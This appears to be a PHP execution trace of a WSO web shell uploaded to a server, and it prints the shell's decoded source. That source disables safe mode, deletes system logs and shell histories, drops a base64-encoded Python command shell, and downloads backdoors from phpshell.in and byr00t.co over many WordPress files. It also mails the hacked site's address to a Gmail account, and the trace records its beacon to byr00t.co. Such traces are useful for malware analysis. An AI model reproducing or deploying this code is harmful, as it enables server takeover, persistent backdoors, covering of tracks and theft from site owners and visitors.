$fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'yazilimlar/sqlbuddy/index.php\')){ echo "<iframe src=yazilimlar/sqlbuddy/index.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionDeleteLOG(){ printHeader();\r\n echo \'<h1>Delete Logs</h1>\';\r\n function cmdExe($in) { $out = \'\';\r\n if (function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } else if (function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n } elseif (function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } cmdExe("rm -rf /tmp/logs");\r\n cmdExe("rm -rf /root/.ksh_history");\r\n cmdExe("rm -rf /root/.bash_history");\r\n cmdExe("rm -rf /root/.bash_logout");\r\n cmdExe("rm -rf /usr/local/apache/logs");\r\n cmdExe("rm -rf /usr/local/apache/log");\r\n cmdExe("rm -rf /var/apache/logs");\r\n cmdExe("rm -rf /var/apache/log");\r\n cmdExe("rm -rf /var/run/utmp");\r\n cmdExe("rm -rf /var/logs");\r\n cmdExe("rm -rf /var/log");\r\n cmdExe("rm -rf /var/adm");\r\n cmdExe("rm -rf /etc/wtmp");\r\n cmdExe("rm -rf /etc/utmp");\r\n cmdExe("rm -rf $HISTFILE");\r\n cmdExe("rm -rf /var/log/lastlog");\r\n cmdExe("rm -rf /var/log/wtmp");\r\n echo \'<div style="padding:5px;\r\n">\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /tmp/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.ksh_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /root/.bash_history <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /usr/local/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/logs <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/apache/log <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/run/utmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/adm <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /etc/wtmp <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> $HISTFILE<br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/lastlog <br>\r\n [<font class="d">OK</font>] <font class="c">Delete:</font> /var/log/wtmp <br>\r\n </div>\';\r\n printFooter();\r\n } function actionPython(){ printHeader();\r\n if(!is_dir(\'python\')){ mkdir(\'python\', 0755);\r\n } chdir(\'python\');\r\n$kokdosya = ".htaccess";\r\n $dosya_adi = "$kokdosya";\r\n $dosya = fopen ($dosya_adi , \'w\') or die ("Dosya a&#231;\r\n&#305;\r\nlamad&#305;\r\n!");\r\n $metin = "AddHandler cgi-script .r00t";\r\n fwrite ( $dosya , $metin ) ;\r\n fclose ($dosya);\r\n $pythonp = \'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB\r\nIHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD\r\nb3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg\r\ncmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv\r\nciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg\r\nY29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg\r\nZm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv\r\nYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g\r\nZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5\r\nOgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y\r\ndCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz\r\ndHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy\r\nb20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs\r\naW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt\r\nc2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw\r\nNCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg\r\nPSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F\r\nVEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl\r\ncwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi\r\nIlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g\r\naXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs\r\ndWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu\r\nZy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g\r\nd2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg\r\naXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg\r\nICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk\r\nXSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt\r\nW2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv\r\ncm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg\r\nPSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y\r\nIGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg\r\nICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z\r\naGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+\r\nCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48\r\nST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl\r\ncnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs\r\nICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg\r\nQ29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr\r\nIHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1\r\ndCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5\r\nZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n\r\nIFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj\r\nIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj\r\ncmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6\r\nIHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg\r\nICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs\r\nYW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt\r\nKFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt\r\naGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+\r\nPEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS\r\nPicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg\r\nICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg\r\nICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv\r\ndXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy\r\naW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv\r\nbiwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv\r\nbW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ\r\nTygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh\r\nbHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg\r\nICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD\r\nSEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0\r\nZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw\r\ncm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi\';\r\n $file = fopen("python.r00t" ,"w+");\r\n $write = fwrite ($file ,base64_decode($pythonp));\r\n fclose($file);\r\n chmod("python.r00t",0755);\r\n echo "<iframe src=python/python.r00t width=100% height=100% frameborder=0></iframe> ";\r\n printFooter();\r\n } if( empty($_POST[\'a\']) ) if(isset($default_action) && function_exists(\'action\' . $default_action)) $_POST[\'a\'] = $default_action;\r\n else $_POST[\'a\'] = \'SecInfo\';\r\n if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) ) call_user_func(\'action\' . $_POST[\'a\']);\r\n \r\n?>\r\n<?php if($_POST[\'query\']){ $veriyfy = stripslashes(stripslashes($_POST[\'query\']));\r\n $data = "data.txt";\r\n @touch ("data.txt");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $veriyfy ) ;\r\n @fclose ($ver);\r\n }else{ $datas=@fopen("data.txt",\'r\');\r\n $i=0;\r\n while ($i <= 5) { $i++;\r\n $blue=@fgets($datas,1024);\r\n echo $blue;\r\n } } $datasi=@fopen("js/js.php",\'r\');\r\n if($datasi){ }else{ @mkdir("js");\r\n $dos = file_get_contents("http://phpshell.in/txt/lamer.txt");\r\n $data = "js/js.php";\r\n @touch ("js/js.php");\r\n $ver = @fopen ($data , \'w\');\r\n @fwrite ( $ver , $dos ) ;\r\n @fclose ($ver);\r\n $yol = "http://".$_SERVER[\'HTTP_HOST\']."".$_SERVER[\'REQUEST_URI\']."";\r\n $y = \'<h1>Sender Yazdirildi.<br/> SITE YOL : \'.$yol.\'<br/>Sender Yolu : js/js.php</h1>\';\r\n $header .= "From: SheLL Boot <suppor@nic.org>\\n";\r\n $header .= "Content-Type: text/html;\r\n charset=utf-8\\n";\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header);\r\n } \r\n?>\r\n<?php\r\nfunction http_get($url){\r\n$im = curl_init($url);\r\ncurl_setopt($im, CURLOPT_RETURNTRANSFER, 1);\r\ncurl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);\r\ncurl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);\r\ncurl_setopt($im, CURLOPT_HEADER, 0);\r\nreturn curl_exec($im);\r\ncurl_close($im);\r\n}\r\n$check1 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/js/js.php" ;\r\n$text1 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1 = fopen($check1, \'w\');\r\nfwrite($open1, $text1);\r\nfclose($open1);\r\nif(file_exists($check1)){\r\n}\r\n$check12 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/index.php" ;\r\n$text12 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12 = fopen($check12, \'w\');\r\nfwrite($open12, $text12);\r\nfclose($open12);\r\nif(file_exists($check12)){\r\n}\r\n$check123 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/images/images.php" ;\r\n$text123 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123 = fopen($check123, \'w\');\r\nfwrite($open123, $text123);\r\nfclose($open123);\r\nif(file_exists($check123)){\r\n}\r\n$check12345 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css/css.php" ;\r\n$text12345 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345 = fopen($check12345, \'w\');\r\nfwrite($open12345, $text12345);\r\nfclose($open12345);\r\nif(file_exists($check12345)){\r\n}\r\n$check123456 = $_SERVER[\'DOCUMENT_ROOT\'] . "/adm.php" ;\r\n$text123456 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456 = fopen($check123456, \'w\');\r\nfwrite($open123456, $text123456);\r\nfclose($open123456);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/css.php" ;\r\n$text1234567 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567 = fopen($check1234567, \'w\');\r\nfwrite($open1234567, $text1234567);\r\nfclose($open1234567);\r\nif(file_exists($check1234567)){\r\n}\r\n$check12345678 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-admin/install.php" ;\r\n$text12345678 = http_get(\'http://byr00t.co/txt/tools.txt\');\r\n$open12345678 = fopen($check12345678, \'w\');\r\nfwrite($open12345678, $text12345678);\r\nfclose($open12345678);\r\nif(file_exists($check12345678)){\r\n}\r\n$check123456789 = $_SERVER[\'DOCUMENT_ROOT\'] . "/cgi-bin/css.php" ;\r\n$text123456789 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789 = fopen($check123456789, \'w\');\r\nfwrite($open123456789, $text123456789);\r\nfclose($open123456789);\r\nif(file_exists($check123456)){\r\n}\r\n$check12345678910 = $_SERVER[\'DOCUMENT_ROOT\'] . "/js/css.php" ;\r\n$text12345678910 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910 = fopen($check12345678910, \'w\');\r\nfwrite($open12345678910, $text12345678910);\r\nfclose($open12345678910);\r\nif(file_exists($check123456)){\r\n}\r\n$check1234567891011 = $_SERVER[\'DOCUMENT_ROOT\'] . "/css/css.php" ;\r\n$text1234567891011 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011 = fopen($check1234567891011, \'w\');\r\nfwrite($open123, $text1234567891011);\r\nfclose($open1234567891011);\r\nif(file_exists($check1234567891011)){\r\n}\r\n$check123456789101112 = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-login.php" ;\r\n$text123456789101112 = http_get(\'http://phpshell.in/txt/seo.txt\');\r\n$open123456789101112= fopen($check123456789101112, \'w\');\r\nfwrite($open123456789101112, $text123456789101112);\r\nfclose($open123456789101112);\r\nif(file_exists($check123456789101112)){\r\n}\r\n$check12345678910111213 = $_SERVER[\'DOCUMENT_ROOT\'] . "/images/css.php" ;\r\n$textk12345678910111213 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk12345678910111213 = fopen($checkk12345678910111213, \'w\');\r\nfwrite($openk12345678910111213, $textk12345678910111213);\r\nfclose($openk12345678910111213);\r\nif(file_exists($checkk12345678910111213)){\r\n}\r\n$check1234567891011121314 = $_SERVER[\'DOCUMENT_ROOT\'] . "/img/css.php" ;\r\n$text1234567891011121314 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314 = fopen($checkk1234567891011121314, \'w\');\r\nfwrite($open1234567891011121314, $text1234567891011121314);\r\nfclose($open1234567891011121314);\r\nif(file_exists($check1234567891011121314)){\r\n}\r\n$check123456789101112131415 = $_SERVER[\'DOCUMENT_ROOT\'] . "/modules/css.php" ;\r\n$text123456789101112131415 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open123456789101112131415 = fopen($check123456789101112131415, \'w\');\r\nfwrite($open123456789101112131415, $text123456789101112131415);\r\nfclose($open123456789101112131415);\r\nif(file_exists($check123456789101112131415)){\r\n}\r\n$check12345678910111213141516 = $_SERVER[\'DOCUMENT_ROOT\'] . "/includes/css.php" ;\r\n$text12345678910111213141516 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516 = fopen($check12345678910111213141516, \'w\');\r\nfwrite($open12345678910111213141516, $text12345678910111213141516);\r\nfclose($open12345678910111213141516);\r\nif(file_exists($check12345678910111213141516)){\r\n}\r\n$check1234567891011121314151617 = $_SERVER[\'DOCUMENT_ROOT\'] . "/phpinfo.php" ;\r\n$text1234567891011121314151617 = http_get(\'http://phpshell.in/txt/phpinfo.txt\');\r\n$open1234567891011121314151617 = fopen($check1234567891011121314151617, \'w\');\r\nfwrite($open1234567891011121314151617, $text1234567891011121314151617);\r\nfclose($open1234567891011121314151617);\r\nif(file_exists($check1234567891011121314151617)){\r\n}\r\n$check123456789101112131415161718 = $_SERVER[\'DOCUMENT_ROOT\'] . "/.well-known/css.php" ;\r\n$textk123456789101112131415161718 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$openk123456789101112131415161718 = fopen($checkk123456789101112131415161718, \'w\');\r\nfwrite($openk123456789101112131415161718, $textk123456789101112131415161718);\r\nfclose($openk123456789101112131415161718);\r\nif(file_exists($checkk123456789101112131415161718)){\r\n}\r\n$checkk12345678910111213141516171819 = $_SERVER[\'DOCUMENT_ROOT\'] . "/sites/css.php" ;\r\n$text12345678910111213141516171819 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open12345678910111213141516171819 = fopen($check12345678910111213141516171819, \'w\');\r\nfwrite($open12345678910111213141516171819, $text12345678910111213141516171819);\r\nfclose($open12345678910111213141516171819);\r\nif(file_exists($check12345678910111213141516171819)){\r\n}\r\n$check1234567891011121314151617181920 = $_SERVER[\'DOCUMENT_ROOT\'] . "/tmp/css.php" ;\r\n$text1234567891011121314151617181920 = http_get(\'http://phpshell.in/txt/lamer.txt\');\r\n$open1234567891011121314151617181920 = fopen($check1234567891011121314151617181920, \'w\');\r\nfwrite($open1234567891011121314151617181920, $text1234567891011121314151617181920);\r\nfclose($open1234567891011121314151617181920);\r\nif(file_exists($check1234567891011121314151617181920)){\r\n}\r\n?>\r\n'	/var/www/html/uploads/wso1.php(4) : eval()'d code	1	0
4	13	0	0.007864	1143752	base64_decode	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	16	1	'aHR0cDovL2J5cjAwdC5jby9sLQ=='
4	13	1	0.007884	1143840
4	13	R			'http://byr00t.co/l-'
4	14	0	0.007900	1143808	GetIP	1		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	16	0
5	15	0	0.007915	1143808	getenv	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	3	1	'HTTP_CLIENT_IP'
5	15	1	0.007932	1143840
5	15	R			FALSE
5	16	0	0.007946	1143808	getenv	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	5	1	'HTTP_X_FORWARDED_FOR'
5	16	1	0.007961	1143840
5	16	R			FALSE
5	17	0	0.007975	1143808	getenv	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	12	1	'REMOTE_ADDR'
5	17	1	0.007990	1143880
5	17	R			'127.0.0.1'
4		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	12	$ip = '127.0.0.1'
4	14	1	0.008017	1143848
4	14	R			'127.0.0.1'
4	18	0	0.008032	1143872	base64_encode	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	16	1	'http://localhost/uploads/wso1.php'
4	18	1	0.008047	1143984
4	18	R			'aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	16	$x = 'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
4	19	0	0.008080	1143864	function_exists	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	17	1	'curl_init'
4	19	1	0.008095	1143904
4	19	R			TRUE
4	20	0	0.008109	1143864	curl_init	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	0
4	20	1	0.008128	1144776
4	20	R			resource(3) of type (curl)
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	$ch = resource(3) of type (curl)
4	21	0	0.008157	1144776	curl_setopt	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	10002	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
4	21	1	0.008177	1144872
4	21	R			TRUE
4	22	0	0.008190	1144776	curl_setopt	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	3	resource(3) of type (curl)	19913	TRUE
4	22	1	0.008207	1144872
4	22	R			TRUE
4	23	0	0.008219	1144776	curl_exec	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	23	1	0.052340	1144808
4	23	R			''
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	$gitt = ''
4	24	0	0.052401	1144776	curl_close	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	19	1	resource(3) of type (curl)
4	24	1	0.052465	1143920
4	24	R			NULL
4	25	0	0.052509	1143888	file_get_contents	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	21	1	'http://byr00t.co/l-127.0.0.1-aHR0cDovL2xvY2FsaG9zdC91cGxvYWRzL3dzbzEucGhw'
4	25	1	0.655516	1147584
4	25	R			''
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	21	$gitt = ''
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	26	$auth_pass = 'a6d13df8a46cf713e5cda6a6c0d043bf'
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	27	$color = '#00ff66'
3		A						/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	28	$default_action = 'FilesMan'
4	26	0	0.655809	1147544	define	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	29	2	'SELF_PATH'	'/var/www/html/uploads/wso1.php(4) : eval()\'d code(1) : eval()\'d code'
4	26	1	0.655828	1147648
4	26	R			TRUE
4	27	0	0.655843	1147576	strpos	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	30	2	'python-requests/2.25.1'	'Google'
4	27	1	0.655859	1147648
4	27	R			FALSE
4	28	0	0.655883	1147576	session_start	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	32	0
4	28	1	0.655952	1148328
4	28	R			TRUE
4	29	0	0.655968	1148328	error_reporting	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	33	1	0
4	29	1	0.655983	1148368
4	29	R			0
4	30	0	0.655996	1148328	ini_set	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	34	2	'error_log'	NULL
4	30	1	0.656013	1148400
4	30	R			''
4	31	0	0.656026	1148328	ini_set	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	35	2	'display_errors'	0
4	31	1	0.656041	1148400
4	31	R			''
4	32	0	0.656054	1148328	ini_set	0		/var/www/html/uploads/wso1.php(4) : eval()'d code(1) : eval()'d code	36	2	'log_errors'	0
